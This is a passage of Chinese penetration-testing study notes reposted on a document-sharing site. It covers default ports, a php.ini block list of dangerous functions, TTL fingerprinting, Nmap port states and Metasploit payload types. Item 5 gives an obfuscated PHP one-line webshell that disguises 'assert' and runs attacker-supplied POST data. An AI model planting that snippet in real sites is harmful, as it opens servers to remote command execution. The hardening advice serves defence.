77范文网 - 专业文章范例文档资料分享平台

渗透笔记整理(8)

来源:网络收集 时间:2021-04-05 下载这篇文档 手机版
说明:文章内容仅供预览,部分内容可能不全,需要完整文档或者需要复制内容,请下载word后使用。下载word有问题请添加微信号:或QQ: 处理(尽可能给您提供完整文档),感谢您的支持与谅解。点击这里给我发消息

8080(tomcat服务器默认、kangle服务器默认)

3128(Squid服务器默认)

8081(用户习惯)

9080(WebSpher服务器默认)

7001(weblogic的默认端口)

4. 在php.ini禁止一些危险函数的执行:

如果不希望执行包括system()等在那的能够执行命令的php函数,或者能够查看php信息的phpinfo()等函数,那么我们就可以禁止它们:

disable_functions = system,passthru,exec,shell_exec,popen,phpinfo

如果你要禁止任何文件和目录的操作,那么可以关闭很多文件操作:

disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir, rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown

此时就能够抵制大部分的phpshell了。

5. 一个非常聪(淫)明(荡)的隐藏一句话方法:

$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4};

@$asse($_POST[$_GET['s']]);

6. 默认情况下,Linux系统的TTL值为64或255,Windows NT/2000/XP系统的默认TTL

值为128,Win7系统的TTL值是64,Windows 98系统的TTL值为32,UNIX主机的TTL值为255。(但这是可以修改的)

7. 在使用Nmap扫描端口的时候,端口状态可能会出现filtered / unfiltered.filtered是指有防

火墙或是其他过滤装置在对这个端口进行过滤,所以Nmap需要进一步查明端口是否开放;unfiltered状态只有在大多数的扫描端口都处在filter状态下才出现,说明Nmap能够访问这个端口,但是不清楚这个端口打开的状态。

8. 安全漏洞生命周期(图片摘自诸葛建伟《Matesploit渗透测试魔鬼训练营》)

9. msfpayload、msfencode和msfvenom可以将攻击载荷封装为可执行文件、C语言、

JavaScript语言等多种形式,并可以进行各种类型的编码。

10. Metasploit攻击载荷模块分为独立(Singles)、传输器(Stager)、传输体(Stage)三种类

型。例如:“windows/shell_bind_tcp”是一个独立攻击载荷。“windows/shell/bind_tcp”是一个由传输器载荷(bind_tcp)和一个传输体载荷(shell)所组成,其功能相当于“windows/shell_bind_tcp”。

百度搜索“77cn”或“免费范文网”即可找到本站免费阅读全部范文。收藏本站方便下次阅读,免费范文网,提供经典小说教育文库渗透笔记整理(8)在线全文阅读。

渗透笔记整理(8).doc 将本文的Word文档下载到电脑,方便复制、编辑、收藏和打印 下载失败或者文档不完整,请联系客服人员解决!
本文链接:https://www.77cn.com.cn/wenku/jiaoyu/1204765.html(转载请注明文章来源)
Copyright © 2008-2022 免费范文网 版权所有
声明 :本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载的作品侵犯了您的权利,请在一个月内通知我们,我们会及时删除。
客服QQ: 邮箱:tiandhx2@hotmail.com
苏ICP备16052595号-18
× 注册会员免费下载(下载后可以自由复制和排版)
注册会员下载
全站内容免费自由复制
注册会员下载
全站内容免费自由复制
注:下载文档有可能“只有目录或者内容不全”等情况,请下载之前注意辨别,如果您已付费且无法下载或内容有问题,请联系我们协助你处理。
微信: QQ: